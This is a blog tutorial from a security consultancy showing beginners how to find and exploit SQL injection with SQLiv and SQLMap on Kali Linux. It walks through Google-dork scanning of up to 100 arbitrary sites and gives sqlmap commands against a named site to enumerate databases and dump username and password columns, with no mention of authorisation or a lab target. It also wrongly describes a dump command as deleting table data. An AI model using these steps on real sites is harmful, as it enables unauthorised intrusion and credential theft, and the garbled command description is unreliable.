The individuals that use databases for various data storage management greatly increase in web app development as time moves on. The database facilitates communication between users and servers. The database gives different benefits including data input and where it is kept, retrieval of large information and the ease of grouping information.
This is both exciting and worrying because in a database there are a lot of important details like credential accounts, financial details and so on. Also, to do SQL injection attacks does not always need an expert injecting capability, in the sense, even kids can do it. Because there are many applications that are useful to perform SQL injection automatically, such as SQLMap. SQLMap is an application for penetration testing activities that aims to conduct SQL injection attacks in database security automatically. Here in this blog, we will show you how to do SQL injection using SQLMap. No special requirements are needed but will be worth more if you master a scripting language. This blog is suggested for those who are new to SQL injection, or who want to see how SQL injection works.
What Is SQL Injection?
SQL injection is specially referred to as SQLi, maybe it’s a most common attack method that uses inappropriate code for back-end database changes to access details that weren't intended to be displayed and are highly mentioned to be highly secret.
How does SQL injection work?
To run a SQL injection, an attacker must locate a weak input in a web application or webpage. When an application or web page includes an SQL injection vulnerability, it uses user input in the form of an SQL query. The attacker can execute a specifically build SQL command as a malicious cyber threat. Then, leveraging this code the attacker can acquire a response that provides a clear direction about the database construction and thereby access to all the information in the database.
How do we do SQL injection using SQLmap in Kali Linux?
- The first step is to install sqliv on Kali Linux
- The next step is finding SQL injection vulnerabilities
- The last and final step is SQL injection using SQL map
How to install sqlive on Kali Linux?
Type following command into your terminal to install SQLiv:
~# git clone https://github.com/Hadesy2k/sqliv.git
~# cd sqliv && sudo python2 setup.py -i
After SQLiv is installed in your Kali Linux, it is kept in the path /usr/bin/sqliv. Which, you can call from the terminal, by typing ‘sqliv’.
How do we find SQL injection vulnerabilities?
We will always use Google Dorking to scan and identify the SQL injection in targets. Let’s take a simple dork, and let SQLiv scan through each target and look for an eCommerce vulnerability at the following URL pattern ‘item.php?id=’. To find other patterns just google for “google dork list”.
~# sqliv -d inurl:item.php?id= -e google -p 100
By default, SQLiv will crawl the f page on a search, which on google sites per page. Thus, here we define argument -p 100 to crawl through 100 sites.
How do we do SQL injection using SQLmap?
Once we got at least one SQL injection vulnerable point, next we run the attack using SQLMap. Firstly, we are required to reveal the database name, the database has tables and columns, Those that contain the data. Steps to follow:
- The first step is to enumerate the database names
- The next step is to enumerate the table’s name
- The third step is to enumerate columns
- Last step is to dump data
How to enumerate the database names:
Command pattern:
~# sqlmap -u “TARGET URL” --dbs
-u / --url : Target URL
--dbs : Enumerate Database/s name
So, for example, the command would look like this:
`~# sqlmap -u “http://www.acfurniture.com/item.php?id=25” --dbs`
How to enumerate tables name:
Command pattern:
~# sqlmap -u “TARGET URL” -D database-name --tables
So, For example, the command compiled be like this:
~# sqlmap -u " the link that you try to inject" -D acfurniture --tables
How to enumerate column names:
Command pattern:
~# sqlmap -u “TARGET URL” -D database-name -T table-name --columns
So, for example, the command compiled be like this:
~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings--columns
How do we dump data?
Command pattern:
~# sqlmap -u “TARGET URL” -D database-name -T table-name -C columns --dump
So, for example, the command compiled be like this:
~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings -C username,password --dump
Or you can also delete all data inside the table, By using the command that gives us an example instead of the given url you should choose the url that you want to do SQL injection:
~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --dump
If you have any queries about the above topic or have to get services and consultations against this serious cyber threat. Feel free to contact us. AIRZERO SEC will be your strong cyber partner.
E-mail id: [email protected]
Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/